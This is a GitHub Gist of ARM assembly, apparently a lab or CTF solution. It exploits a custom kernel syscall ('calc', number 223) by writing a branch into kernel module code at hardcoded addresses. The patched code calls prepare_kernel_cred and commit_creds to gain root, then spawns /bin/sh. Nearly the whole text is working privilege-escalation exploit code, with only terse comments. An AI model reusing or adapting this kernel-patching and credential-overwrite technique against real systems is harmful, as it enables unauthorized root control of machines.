Last active
July 31, 2018 13:02
-
-
Save HopHouse/04182707d82b569f963958f58f70dbfb to your computer and use it in GitHub Desktop.
SYSCALL ARM
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
.data | |
sh: | |
.asciz "//bin/sh" | |
result: | |
.word 0x00000000 | |
.text | |
.global _start | |
/* | |
syscall(223, a, o, b, &r); | |
*/ | |
_start: | |
/* | |
* Write jump to | |
*/ | |
ldr r0, =0xea000000 | |
ldr r1, =124 /* operand | */ | |
ldr r2, =0x00000000 /* load the value 0x00000000 into R2 */ | |
ldr r3, =0x7f0001bc /* location of + branch operand in module code */ | |
mov r7, #223 /* syscall 223 -> calc */ | |
svc #0 | |
ldr r0, =0x00000000 | |
ldr r1, =124 /* operand | */ | |
ldr r2, =0x00000000 /* load the value 0x00000000 into R2 */ | |
ldr r3, =0x7f0001c0 /* location of + branch operand plus 4 in module code */ | |
mov r7, #223 /* syscall 223 -> calc */ | |
svc #0 | |
ldr r0, =0xe51ff004 | |
ldr r1, =124 /* operand | */ | |
ldr r2, =0x00000000 /* load the value 0x00000000 into R2 */ | |
ldr r3, =0x7f0001c4 /* location of + branch operand plus 8 in module code */ | |
mov r7, #223 /* syscall 223 -> calc */ | |
svc #0 | |
/* | |
* Adress of the jump | |
*/ | |
ldr r0, =elevate | |
ldr r1, =124 /* operand | */ | |
ldr r2, =0x00000000 /* load the value 0x00000000 into R2 */ | |
ldr r3, =0x7f0001c8 /* location of + branch operand plus 12 in module code */ | |
mov r7, #223 /* syscall 223 -> calc */ | |
svc #0 | |
/* | |
* Read our elevate function and jump to it | |
*/ | |
ldr r0, =8 | |
ldr r1, =43 /* operand + */ | |
ldr r2, =8 | |
ldr r3, addr_of_result | |
mov r7, #223 /* syscall 223 -> calc */ | |
svc #0 | |
/* | |
* We have the root uid, so let's open a shell | |
*/ | |
b shell | |
_exit: | |
mov r7, #1 | |
svc #0 | |
/* | |
* Get root uid | |
*/ | |
elevate: | |
mov r0, #0 | |
bl 0x80042464 /* prepare_kernel_cred */ | |
bl 0x80042148 /* commit_creds */ | |
bx lr | |
/* | |
* Open a shell | |
*/ | |
shell: | |
ldr r0, =sh | |
sub r2, r2, r2 | |
push {r2} | |
push {r0} | |
mov r1, sp /* r0 */ | |
mov r7, #0xb | |
svc #0 | |
addr_of_sh: .word sh | |
addr_of_result: .word result |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment